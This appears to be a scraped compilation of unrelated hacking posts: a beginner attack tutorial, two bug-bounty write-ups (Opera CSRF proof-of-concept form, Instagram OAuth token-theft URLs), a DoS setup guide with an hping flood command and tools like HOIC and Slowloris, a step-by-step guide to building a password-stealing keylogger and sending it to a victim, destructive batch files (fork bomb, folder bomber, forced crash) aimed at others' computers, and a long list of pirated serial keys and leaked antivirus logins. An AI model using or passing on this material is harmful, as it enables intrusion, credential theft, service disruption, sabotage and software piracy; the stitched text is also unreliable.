You need to have the ability to research, analyze vulnerability& apply the exploit to achieve what you want. Buffer overflow is a very common & hard to produce an application with no buffer overflows at all. There is nothing programmers can do about it, they just need to write the code with security mind of set. If unexpected buffer overflow appears later by chance, programmers will have to fix it. Programmers should test their code from vulnerabilities as much as they can before they publish the application.

Rootkits: it is a common hacker technique. Rootkit is malicious program that replaces components of OS. It does a stealth job. Rootkit requires root permission, so you can install it. Linux rootkits are common & you can find them everywhere, unlike Windows. It is very hard to detect a rootkit because it embeds itself so deeply into the target system. Removing rootkit from a system is very hard too, if the security person tries to remove the rootkit out of the system, he will destroy the system since the rootkit is embedded so deeply into the system(into components of OS). The good solution is to format the whole system & install it again.

Spoofing: the word spoofing defined as making yourself appear as somebody else. Examples of spoofing, you can spoof an IP address and make yourself appear to be somewhere else, MAC addresses, and emails(very simple to spoof, you send an email to somebody by changing the headers, and things like that). Spoof usually relies on poor implementation of TCP/IP itself or poor implementation of applications. Tools that are used for spoofing differs from one platform to another. Example of the tools, IP spoofing utilities, MAC address modifiers, etc. Spoofing is more into using your skills rather than using a tool.

Denial of Service (DoS): DoS is very common. The ultimate idea is to prevent legitimate users from using the system. Running DoS is very simple, you don't gain anything from doing DoS. Hackers do it to threat companies, things like that. Many methods/level of DoS attacks exist. Examples of some ways of to DoS, ping of death, Windows size overflow, smurf, teardrop attacks, and many more. There are lots of different ways to do it!

Web Hacking: web hacking is the most popular attacks. It is based on hacking individual sites, servers, or components based on the website. First step a hacker takes is, enumerate services(applications) on target machine, and then determine what webserver software(apache, IIS, etc) is running on the target system. After that, the hacker exploits against vulnerability. found in the target system. It will be easier to hack if the hacker knows the version of the service/software running.

A webserver attack leads to deeper penetration on the network(move into the target's internal network). Popular attack methods are xxs(cross-site scripting), IIS DLL vulnerabilities(IIS is very commonly exploited), directory traversal, unicode attack, and many more.
What is Unicode attack?
here is quick rough description about Unicode attack, lets say you want to pass space into a URL. If you put a space in URL, webserver will not take your URL, webserver will consider the url is invalid. Thus, if you want to put spaces among the URL, you should put the number 20 in a place of the space(number 20 represents the space), so when the URL goes to the webserver, the webserver says Ok! that's a valid URL, lets process it and so it does. Unicode attack uses this technique in a non-standard(bad way) way to attack the webserver. That's a quick explaination about unicode attack.

I'm already about to finish this tutorial, i will just talk about popular tools in a brief manner. I will start with namp.

Nmap is the most popular hacker tool out here. Linux command line nmap works better and is supported better. Nmap comes with ping utility, port scanning utility, service enumeration & OS fingerprinting.

SuperScan is a windows based tool developed by foundstone Inc. Its easy to use it & a good tool for Windows.

Nessus is used for vulnerability assessment. It is an open source software kit, with commercial version available as well. Nessus uses client/server architecture. Server will be installed on a central location. Nessus comes in GUI & command line interface. Nessus uses database that carries latest current exploits for all types of OS & application. Databases in nessus are called plug-ins, hundreds of vulnerability plug-ins exist and are updated daily to include latest exploits. Nessus requires high level of knowledge to use the tool very efficiently. You can go out to the web and download an exploit and then add it to the database. Nessus can take quite long time to do vulnerability assessment.

Finally, the information in this tutorial have been gathered from various types of sources, and then i wrote the tutorial in an organized manner from scratch as well as i added some stuff & clarified many parts.

After you have read this tutorial, i recommend you to search and learn about Windows Null Sessions, it is the most critical flaws associated with Windows OS, and google about DNS zone transfers!

This tutorial is a good guide for you that gives you an insight on how to start & different techniques that hackers use and how they are used. I hope you have enjoyed this tutorial & helped you in someway or another. I'm not supporting any illegal activities. This tutorial for people who wants to know how hackers think, what steps they take to break into systems & how they do it, so people can have an insight on how to protect themselves against intruders.

Please do not forget to RATE and leave your feedback here.
Enjoy.

Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.

I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:

Stored XSS

The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.

CSRF POC

The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.

POC

<html>

<body>

<form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">

<input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />

<input type="hidden" name="name" value="Rafay&#32;Baloch" />

<input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />

<input type="hidden" name="address2" value="" />

<input type="hidden" name="city" value="Karachi" />

<input type="hidden" name="state" value="" />

<input type="hidden" name="country" value="PK" />

<input type="hidden" name="zip" value="44000" />

<input type="hidden" name="phone" value="&#43;923333333333" />

<input type="submit" value="Submit form" />

</form>
</body>
</html>

Opera Hall Of Fame

So, For my findings, Opera listed my name under their hall of fame:

Gift from Opera

As a token of appreciation, they also send me the following gifts:

Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.

Welcome anons to #Setup

Here we will cover the basics you need to know in order to stay safe and get your software configured.

VPN:

A vpn hides your real ip and replaces it with the tunnel you are connecting through, this means that you are extremely hard to trace back - not impossible however.
DO NOT use free VPN's, proxies or TOR. Free VPN's keep logs of users activity and would happily hand it over to any law enforcement agency. Some suggestions VPN providers that are trusted and don't keep logs.

When selecting your VPN make sure you choose Openvpn and not pptp, unless you are using it strictly on your mobile device. Most mobile phones especially Android DO NOT support openvpn unless you are running a custom ROM.

Commonly Used (swedish servers)

1. http://anonine.se/

2. http://www.vpntunnel.se/

Also using a VPS and your own vpn is another good option.

Also perform a dns leak test after your vpn is installed and configured.

http://www.dnsleaktest.com/ (Follow the site instructions)

More info regarding your VPN and making it more secure can be found here:

http://torrentfreak.com/how-to-make-vpns-even-more-secure-120419/

Network testing tools, alternatives to LOIC: (Do NOT use LOIC)

Hping:

hping is a command-line oriented TCP/IP packet assembler/analyzer.
The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Easy to use system, when it has downloaded for your appropriate OS please install and choose to use

Homepage: http://www.hping.org/download.php - Windows/Linux

http://www.youtube.com/watch?v=fagjmQi-sBY

http://www.youtube.com/watch?v=fRxnzAWX5ag

HPING COMMAND: hping3 -i u1 -S -p 80 (site)

Slowloris :

The low bandwidth, yet greedy and poisonous HTTP client!
This is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long. Slowloris works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don't have those modules already.
You can install modules using CPAN:
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

Homepage: http://ha.ckers.org/slowloris/ - Linux

http://www.youtube.com/watch?v=kPo8wVxsXAA

Hoic:

- High-speed multi-threaded HTTP Flood
- Simultaenously flood up to 256 websites at once
- Built in scripting system to allow the deployment of 'boosters', scripts designed to thwart DDoS counter measures and increase DoS output.
- Easy to use interface
- Can be ported over to Linux/Mac with a few bug fixes (I do not have either systems so I do
- Ability to select the number of threads in an ongoing attack
- Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH
and its written in a language where you can do a bunch of really nifty things
just read the RealBasic manual, ;] also no Dependencies (single executable)

Download: http://www.mediafire.com/?jkc7924jsa0161z

http://www.youtube.com/watch?v=qmhDQtsbPAk

Pyloris:

PyLoris is a scriptable tool for testing a server's vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

Homepage: http://motomastyle.com/pyloris/

Sourceforge: http://sourceforge.net/projects/pyloris/

Do NOT use Tor for Dos all it does is hit Tor's Network.

Test DOS tools on 127.0.0.1

By Chris defaulter ;)

How to set up a keylogger

First of all, heres what this method will require and what it will involve:

- A Brain
- Keylogger, we will be using one called SysLogger
- Target
- Making a fake program that the target will want to open
- An email (preferably a Gmail)

So, lets get started.

Open it up. You will be given a message, just click ‘OK’.
Following that the GUI Should Open Up..
Tick the following boxes:
- Encrypt email
- Stealers
- Delete cookies
- Block AV sites
- USB spread
- Startup
- Kill Taskman (optional, leave blank if you want this to be more stealthy)
- Force steam
- Clipboard logger
- Screen logger
Those options will do the following:
Stealers = Sends you saved passwords for internet browsers
Block AV site = Stops the victim from checking an antivirus site if they get suspicious
USB spread = Infects any USB devices plugged into the machine, so if they are put into other computers they will infect them
Startup = Runs the keylogger every time the machine is switched back on
Kill Taskman = Stops the victim opening task manager
Clipboard logger = Saves anything copy/pasted
Screen logger - Sends you a screen shot of the victims PC

Next we have to tick the box called ‘Enable Error’. This will give the victim an error message when they open the file, make sure you put in something creative, but relevant the fake program.
Now we need to fill in the mailing options. I recommend using mail as opposed to FTP because it is more secure and its a lot easier. Put in your email address and password. If you are using a Gmail you don’t have to change the ‘SMTP’ options, if you aren’t google the SMTP options for your email provider. Click ‘test email’, if a box pops up saying success, you’ve done everything right, if not, go back and do it again. There should be a box below that which says ‘Interval’. Set that to whatever time you want.
Now click ‘Change file properties’. This will open up another GUI. Find an icon that suits your fake
Close the properties window.

Click ‘Build Server’. This will build the keylogging file. Make sure you have your antiviruses disabled as they will delete the file. You can reactivate them when you are done.

Congrats, you’ve built the keylogger!

Now all you need to do is send it to your victim and get them to open it!

If you accidentally open your keylogger, just open up SysLogger and click ‘Cure’. Type in the name of the file and you will be cured.

How I Hacked Instagram Accounts - Break Security

How I Hacked Instagram Accounts

Hi guys,

For this post, I’m going to show you what I found in Instagram OAuth, and how I was able to hack into Instagram accounts using the OAuth vulnerabilities on Instagram.com/facebook.com.

There are basically two ways to take advantage of the Instagram OAuth in order to take control of those accounts.

1.

Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2.

Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)



If the attack is successful, it could provide access to:
Private photos
The ability to delete photos and edit comments
The ability to post new photos

Because I’m a big Instagram “fan,” I thought to myself, “Why not take a look at its security?”

Here come my story regarding Instagram,

When Facebook Acquired Instagram, I Start to check them for Security Vulnerabilities,

I reported a few issues to Instagram Include OAuth Attacks, But the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar, Then Facebook Security send me a message, They say even that they was unable to fix this issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,
Anyway, I told to Facebook that I don’t want any payout for my bug findings because they was unable to perform a security checks before the acquisition have been closed, It’s amazing to see how Facebook Security doing a great job regarding their bug bounty program, Even that they didn’t close the acquirement, They Still wanted to pay for my findings,

Now for my findings:

So, first, I checked Instagram’s OAuth protocol:

(http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, I noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.
In addition, redirection was only allowed to go to the owner app domain. That was particularly bad news for me.

Thus, I needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.
For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say my app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).


It’s also feasible to purchase other breaksec.com domains like:

com.tw

com.mx

com.es

com.co

com.bz

com.br

com.ag

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token



Game Over.



Bug 2.



With this bug, I used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).



When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.
o my surprise, I discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.



PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token


See You next time... 

DEADLY PC TRICKS

In this tutorial I'm going to explain some deadly batch file tricks and hacks that can completely destroy your Windows Registry, You have to re-format your computer to bring it back to normal. Batch files discuessed in this post can create a real havoc on your computer, they can completely irritate you so don't try them on your PC.

Use them on your friends or enemies computer.

1. Folder Bomber
This batch file will create 3000+ folder in less than a minute.
Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and

%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

2. Fork Bomber
It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste

the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />

3. Getting Blue Screen Of Death (BOSD)
You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever

you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to

crash your Windows box.
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to

reboot it. Just follow these steps:

Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key

twice.

3. Prank Virus
Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo L
NOTE:-Try it your own Risk

50+ Serial Keys For Popular Software

╚═►VMware Workstation v9.X ◄═╝

Serial Key:→↓

ZF3X0-4ZW0Q-0842P-E6PGC-PKRZF
VY19K-01X5L-084MY-MXMZG-MAUF2
YA5X2-FEFDK-H80VQ-4YWQC-MPARD
YU1WA-F1GD7-485UQ-ADNNT-XCAR6
GF1WR-FGZ5J-485RY-JGQQC-XZ2G8
AY3HA-F1D5N-08D7Q-Z6X5T-XK2G2
YG5EK-D1X8L-088XY-NNQEC-P3AW6
VF14H-0YFE5-48D2Z-ZDPNT-YFUZ8
ZU31H-2WY83-0853Y-Z5WQZ-ZAAC6
GC1WK-F8XEM-M812P-9WMG9-XUU9F
AY540-00W0M-088DY-GDQ7T-QL8Z8
FF34U-A5W11-H80UP-F6WNV-NL8V6
CF71K-AGD52-H894Q-Q4P7E-XL2R6
YZ5MA-6GXDP-0841Y-K4PNG-XK2ZF

========================================================================

╚═►NovaPDF Professional Desktop v7.7.387◄═╝

Name : Dennis Anker

Serial: B11F-8V0T-XRU2-Z344-4MDF-2WM5-6XEB-NHK4

========================================================================


╚═►Microsoft Office 2013◄═╝

S/N: 9MBNG-4VQ2Q-WQ2VF-X9MV2-MPXKV

========================================================================



╚═►PowerDVD v5.0◄═╝

S/N: MV588995988G2285


========================================================================
╚═►Active Partition Recovery Enterprise v8.0◄═╝

Registered Name: Bernhard Walder

Registration Key: 00001Q-RB25T2-24ZXFW-WVDC84-RCD4EQ-YWMDZ6-MD61TD-VQ4VMU-87UDC3-5JB9DX-8NJMPA


========================================================================

╚═►AUTO CAD 2013◄═╝

sl no= 110-10061620, product key= 781E1

========================================================================

╚═►Internet Download Manager v6.15.1 Serial◄═╝

First Name: Anything
Last Name: Anything
Email: Anything
Serial: 7G7QY-NZWKQ-23KRA-RAMQ4

========================================================================

╚═►Registry Workshop v4.6.2◄═╝

Serial Key:→↓

01CBC4B66A06969B2638235982DED475E724C63B3D32A13286D226D99703423AA060156394800258D5EF54FCCFB52306C7A2AA1D44A028E17E2833D3CC70F31E

========================================================================

╚═►USB Disk Security v6.2.0.30 Serial Key◄═╝

ACADEMIC
18027
------------------------------
ABUTTER
18011
------------------------------
ABRAZITE
17950
------------------------------
ABRADE
17875
------------------------------
WIRING
17820

========================================================================

╚═►Advanced Archive Password Recovery Pro v4.53◄═╝

↓→:Serial Key:→↓

ARCHPRP-NWGTN-45653-DXZWD-93326

ARCHPRP-LEHKE-58253-RHCZW-73269n

========================================================================

╚═►Internet Download Manager v6.14.3◄═╝

First Name: Any Name

Last Name: Any Name

Email: Any Email

Serials:

7G7QY-NZWKQ-23KRA-RAMQ4

or

D4B22-SWRY9-FLFVP-NETDI

========================================================================

╚═►ImTOO Video Converter Ultimate
v7.7.0.20121224◄═╝

←↓→:Serial Key:→↓←

3A17-E5E5-C390-A079-39A9-E3EA-80A4-6C62
CB28-7E7E-5CA1-B182-F8A7-0041-D754-4B55
A5C6-1818-3A4F-5F69-E202-75D0-89ED-FC87
C3A1-7E8E-5C39-3A00-7C33-822B-389B-44D3
1BC5-E0E7-92BC-BC56-1161-A53D-F9E7-918D
A18F-5C6C-3A17-18EB-34FC-2042-46A4-5695
816C-5A5A-38E7-17C3-9E64-05A5-257B-02BF

========================================================================

╚═►FutureDecks DJ Pro v3.0.5◄═╝

Serial Key:→↓

759P4A3S56MN
M669C575KC43
L7NNSFL5MPPK
99765CLCKHK5
F9K65L35C5C5

========================================================================

╚═►avg internet security 2013◄═╝

Licence: 8MEH-RFR8J-PTS8Q-92ATA-O4WHO-JEMBR-ACED

========================================================================

╚═►Microsoft Windows 8 RTM◄═╝

---------------Key:--------------------

6CNK2-RTVRV-TXYQK-86DBM-B4DHC
3HBY3-3GNXP-22R96-CCMCB-HT67C
KGQND-Q2HH6-XHXHC-89VWW-82KVC
F2V7V-8WN76-77BPV-MKY36-MKH3P

========================================================================

╚═►Adobe Photoshop Lightroom v4.3◄═╝

Serial Key: →↓

Name: mahn
Serial: 1160-4808-4026-5497-2931-5822

Name: Flash Gordon
Serial: 1160-4859-8564-6751-6040-3185

Name: Green Lantern
Serial: 1160-4254-4822-7250-4150-5688

========================================================================


╚═►Any Video Converter Ultimate v4.5.8◄═╝

Name: LiveLong

Serial: 0000KZ-KFQ4Q5-21UJ38-7AB787-812BM7-209R1A-DNTPG7

========================================================================

╚═►TeamViewer Premium 5.1.9290 serial number ◄═╝

s/n: 09-31004-61457-936046

========================================================================

╚═►Photoshine Serial Key ◄═╝

name :ACPJ0020C4E

serial : A0JJ8022CFB

========================================================================

╚═► PowerISO 5.4◄═╝

Name: PowerISO

Serial: M9PHF-E3AK2-Q166Y-DAQ1H-TVXVJ


========================================================================

Kaspersky Internet Security 2013 License Key :-

Use One Of This Activation Code To Get 90 Days License →↓

4GGYH-S7HEJ-QEGXT-4C88H

(OR)

QCGUH-J8FF6-33WGA-UBY62

========================================================================

╚═►TuneUp Utilities 2013 v13.0.2020.15◄═╝

Serial Key: →↓

FC661R-DA19J6-9WFX5T-79RYJX-DX6T1Y-A9K5E3

WVACTK-RNWVQ9-AK1YVC-Y07WYB-TB9Y5H-FVHFA8

C9ATBK-F4CXJE-H60MH3-NHXPKQ-80RPB9-0KF6V2

99VV7M-KRN8PK-4PDPX4-KY9Y7T-Q7TQ34-WJ5AKD

HNBHQA-B3QEWW-4Y6TWC-KXDRT8-QR4591-CRTV8H

9H2JWP-YPKKAM-3M8TAD-J82PYB-55WMFN-N5K428

8DRYX9-B4AKRK-CTH3TE-N0QFY1-RX777P-TTRKC6

MWETXX-RA0TAM-J570RF-YFHNW9-VMEVV0-60666M



========================================================================


Avast! AntiVirus v7.0.11 License Key Expiry Date
(2038) :-

C2092321R9946A0912-U52DEWK3

OR

C2092321R9946A0912-U52DEWK3

========================================================================

╚═►Flash Player Pro v5.4◄═╝

Name: LiveLong
Serial: LdfFla-23B9AC7E23E323AA6E448A9BD65AADFB

========================================================================

╚═►Hide Files and Folders v3.5◄═╝

Serial Key: →↓

a66e44fe14a7fcd5
be8054ffac8c3d28
3d5cbbdd6049fe6b
788887cd0bbcf8e2
fd434bde7a94fe93


========================================================================

╚═►Nitro PDF Professional Enterprise 8 v8.0.6.3◄═╝

Serial: →↓

NP8D95K4GG0610986CC
NP8D28K08K861091A52
NP8D8F04GSK619D6560
NP8D98G4XKS61068817
NP8DD60C8S061FC5394
NP8D23CX8C8612FA36D
NP8DCD8GOK4610DCCA4
NP8D03S4SGK612D6DA0
NP8D772561161D133E8
NP8D764G84C61247501
NP8D2F4KXC861F6DFBA
NP8D03C80SK613F59AA
NP8D20KSX08613BF266
NP8DCD4COS46100F9C6
NP8D52G00O0614E8C6C
NP8D772561161D133E8

========================================================================


╚═►SUPERAntiSpyware Professional v5.6.1014◄═╝

Serial Number: 322-412-2500
Activation Code: 60c2-7e0c-10ad-329d

Serial Number: 395-790-9638
Activation Code: b8b9-f84b-0e4d-dd7d

Serial Number: 109-577-0923
Activation Code: ca2c-0423-1199-78f0

========================================================================


╚═►Office 2010 professional plus Serials◄═╝

BDD3G-XM7FB-BD2HM-YK63V-VQFDK
W3BTX-H6BW7-Q6DFW-BXFFY-8RVJP
DX4MW-PB7F4-YR4WT-BV3MM-4YV79
6D739-9F4F2-BKKV8-YCHRF-PWR8B
4C9PX-DH3G9-D424D-FGGKF-PRWH3
W3G79-KFKR2-M9C86-JG748-G8373

========================================================================


╚═►Avast 5+6+7 serial ( Free )◄═╝

S/N: W6754380R9978A0910-4TZ59467

========================================================================


╚═►USB Drive Antivirus V.3.02 Build 0509◄═╝

1. NAME-USB Antivirus
Serial-WWHKZY
---------------------------
2. NAME-User
Serial-WWKZ
---------------------------
3. NAME-Rock_OM
Serial-TSIS
---------------------------
4. NAME-Frendz
Serial-HVKVN

========================================================================


╚═►Corel Graphic Suit X6◄═╝

S/N: DR16R22-LZA9ZQN-6HPW8RX-6QTKYZ

========================================================================


╚═►Corel Video Studio 12 Serials ◄═╝

VS14R22-PZ9U4XB-4USTVDL-PEPLKE2
VS14R22-D3466GB-UUS6K43-7EQW6UW
VS14R22-PR6QWBP-GUCYVNG-UKSQJHA
VS14R22-T5525UA-V4EG9DR-P6TB6UE
VS14R22-UYC4CTQ-BPQJT25-WTT4SPS
VS14R22-9LHHX33-ZP4N5P4-SBM7HGS
VS14R22-D8YUMAB-A2Q3YNE-HMQWNWE
VS14R22-R5BNPCQ-DKY26BT-DPY6C9J
VS14R22-QKDXPFN-YRVKL2E-HGZRG6E

========================================================================


╚═►Super DVD Factory v5.7 ◄═╝

Name: freeserialkey

Serial: 1199BA01C9C8B64244B4A42A662A723A2CBF089A005BE4CF26AE68FCCF22992A0E9CF910CF06804A6686148DFD58C8293818E5268FB78439C578DAAD2A87BFFF2F60CC40A24D7C4707A8A8A572431074A008160333830C862C73D3BAC576CF11803C0D84142979EC5834921FE9C4E63896150A4F3EC32C61028A1F493D0003C5

========================================================================


╚═►Virtual DJ 6◄═╝

Serial: WBBS-UCHF-UBBLG

========================================================================


╚═►Sony Sound Forge 7.0.0.262◄═╝

SN : HQ-EM4R8P-7S407G-S93NCR

========================================================================


╚═►ADOBE PREMIERE PRO CS4 SERIAL KEYS◄═╝

1132-1033-0380-3409-5427-6334

1132-1686-5385-1891-1718-6945

========================================================================


╚═►Quick Heal Total Security version: 13.00
(6.0.0.4)◄═╝

Serial: VNI4-GACF-2358-RSUW

========================================================================


╚═►Avira internet security 2012 until 19 April 2013
key :◄═╝

Serial: P3WWW-WWWT3-PJHYD-CNCJ3-7973S

========================================================================


╚═►ESET SMART SECURITY 4 and 5,6 !◄═╝

Username: EAV-71746858
password : kbbmak3xen
06-12-2012

Username: EAV-71549467
password : 8ad8k72nbm
04-12-2012

Username: EAV-72535882
Password:j2jfk4u6pe
Expire:21-10-2012

Username:EAV-72535886
Password:xbjaarhjs5
Expire:21-10-2012

Username:EAV-72535888
Password:h6sb4ctejc
Expire:21-10-2012

Username:EAV-72535884
Password:rmjcev7tra
Expire:21-10-2012

Username:EAV-72535899
Password:cdedc44tt3
Expire:21-10-2012

========================================================================


╚═►avg antivirus 2013 Serial◄═╝

8meh-r9q3v-zhe2t-92kcr-a9gls-yembr-aced
8meh-rlkzo-8chhh-hsyka-kauxg-sembr-aced
8meh-r6633-ypt9h-ycnsr-h42ot-eembr-aced
8meh-r2cml-sswfw-moxfr-tcrgu-3embr-aced
8meh-rfod4-sx7r8-jrtqa-jgero-wembr-aced
8meh-rnzll-2yuqx-79ppa-m3tde-aembr-aced
8meh-rk82s-pwf92-c33ba-qdw4h-gembr-aced
8meh-rf22z-an7hs-qdwmr-2eebp-bembr-aced
8meh-ryh2w-sak7n-h2hga-w73j4-9embr-aced
8meh-rnxbd-gmngf-bslsr-zjkod-pembr-aced
8meh-rf4bz-fh4uo-vrv3a-4ch9l-dembr-aced
8meh-rg9b7-bggvc-pxrcr-jpr2l-hembr-aced
8meh-rvega-vjyy3-y3dla-8nxy2-6embr-aced

========================================================================


Windows 8 developer preview product key

6RH4V-HNTWC-JQKG8-RFR3R-36498

========================================================================


AVG Antivirus Professional 2012 Serial Number
+++++++++++++++++++++++++++++++++++++++
8MEH-RW2ZU-29S4F-26QCR-WFZV4-BEMBR-ACED
8MEH-RREY3-L2LQA-LUMOR-UHNK2-6EMBR-ACED
8MEH-RPDWL-THRLY-O8Z3R-474SC-4EMBR-ACED
8MEH-RPTGT-KMOL7-EEEVR-KORKD-LEMBR-ACED
8MEH-RMXLW-HN44A-BABPA-SBK3B-PEMBR-ACED
8MEH-RCKOP-BP9KK-YW8EA-6K8TK-SEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTBZ6-QEMBR-ACED
8MEH-RAJC2-O3P77-KRRQA-H3SLN-REMBR-ACED
8MEH-R2CML-SS7FW-MOXFR-TRU8V-3EMBR-ACED
8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
+++++++++++++++++++++++++++++++++++++++

========================================================================


Nero 11.2.00400

Code: 9004-0173-5M17-EU7K-KLPZ-XT4P-2MT3-4PA8

========================================================================


Nero 11.2.01000

Code: 9004-0173-5M17-EU7K-KLPZ-XT4P-2MT3-4PA8

========================================================================


╚═►Adobe Flash Professional CS5◄═╝

Serial Key:→↓←

1302-1194-4375-5059-8090-0288
1302-1956-2248-1616-0365-7124
1302-1645-5592-7683-5740-9343
1302-1065-1908-3692-6001-0784
1302-1086-3696-5544-5238-9400
1302-1339-8680-7615-5184-8324
1302-1065-1908-3692-6001-0784
1302-1059-9625-8530-7802-6962
1302-1339-8680-7615-5184-8324
1302-1116-8780-8984-8675-8256
1302-1912-4694-1510-2945-5932
1302-1059-9625-8530-7802-6962
1302-1194-4375-5059-8090-0288
1302-1339-8680-7615-5184-8324
1302-1956-2248-1616-0365-7124
1302-1912-4694-1510-2945-5932
1302-1116-8780-8984-8675-8256
1302-1956-2248-1616-0365-7124
1302-1912-4694-1510-2945-5932
1302-1065-1908-3692-6001-0784
1302-1835-3972-5775-4732-9757

========================================================================


╚═►FIFA 12 serials online (PC)◄═╝

Serial:→↓←

QJAA-SCPR-2XYK-X3ML-0UNL
S4LU-NP8Z-GKAD-7GK2-JRLD
Y7GY-CSUG-3B54-3V1N-0UNL
MXMD-8GX6-23KL-Q67F-0UNL
5Y9H 9GCV 6L7F 7GG4 DU6E


========================================================================



╚═►Adobe CS3 Keygen serial number◄═╝

Serial number:1326-0651-74702-0424-4066-8309
Activation number: 3244-5309-7205-7250-5740-2918-5471
Activation type: Normal


========================================================================



╚═►Windows XP SP2 geniune key◄═╝

Serial: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ


========================================================================




╚═►SpeedUpMyPC 2013◄═╝

Licence Key:→↓←

SP-EKSPY-W97SD-VRMZN-CWM4C-MJKVH-EHAZ8


========================================================================




╚═►Game Maker 6◄═╝

Serial: E3133057BE7AD9E655FEE02F


========================================================================


╚═►WinUtilities v10.53 Professional Edition◄═╝

Serial: WYMTGGP-7362-85FE-A519-4F96-QKWU


========================================================================




╚═►Cyberlink Powerdirector 9◄═╝

Seiral: BF937-FZ7NB-KHZEY-B3LAP-BNEFL-VT3EW


========================================================================



╚═►Your Uninstaller Pro 7.5.2012.12 Serial ◄═╝

